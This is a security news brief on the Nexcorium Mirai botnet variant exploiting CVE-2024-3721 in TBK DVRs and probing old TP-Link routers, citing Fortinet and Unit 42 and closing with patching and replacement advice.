Threat actors are exploiting flaws in TBK DVR devices and end of life TP-Link Wi-Fi routers to deploy Mirai botnet variants on compromised systems, according to a technical analysis by Fortinet FortiGuard Labs and a disclosure from Palo Alto Networks Unit 42. The activity includes abuse of CVE-2024-3721, a medium-severity flaw in TBK DVR-4104 and DVR-4216 devices, to spread a variant called Nexcorium.
KEY FACTS
- Targeted flaw CVE-2024-3721 affects TBK DVR-4104 and DVR-4216 devices.
- Malware family The payload is a Mirai variant named Nexcorium.
- Other targets Automated probes were also seen against CVE-2023-33538 on older TP-Link routers.
- Persistence The malware uses crontab and systemd services to stay on infected devices.
The report says the attack on TBK DVRs starts by exploiting CVE-2024-3721 to drop a downloader script. That script then launches a payload matched to the device’s Linux architecture. Once active, the malware displays the message, “nexuscorp has taken control.”
Fortinet said Nexcorium shares traits with other Mirai-derived botnets, including XOR-encoded configuration data, a watchdog module and a DDoS attack module. It also includes an exploit for CVE-2017-17215, which targets Huawei HG532 devices, along with hard-coded usernames and passwords for brute-force attacks over Telnet.
If a Telnet login succeeds, the malware tries to gain a shell, set up persistence and connect to an external server for commands. The report says it can launch DDoS attacks over UDP, TCP and SMTP and deletes the original downloaded binary after persistence is established.
Unit 42 said it also observed automated attempts to exploit CVE-2023-33538 on older TP-Link routers, but the observed method was flawed and would not lead to compromise. The vulnerability affects TL-WR940N v2 and v4, TL-WR740N v1 and v2, and TL-WR841N v8 and v10, which are no longer supported.
Researchers said successful exploitation of the TP-Link flaw requires authentication to the router’s web interface. They advised users to replace unsupported devices and avoid default credentials, which can turn a limited weakness into a broader entry point for attackers.
WHY IT MATTERS
The findings show how attackers continue to use known flaws, weak passwords and outdated IoT devices to grow botnets and support DDoS campaigns. For owners of exposed cameras, DVRs and routers, patching where possible and replacing unsupported hardware remain the main defenses.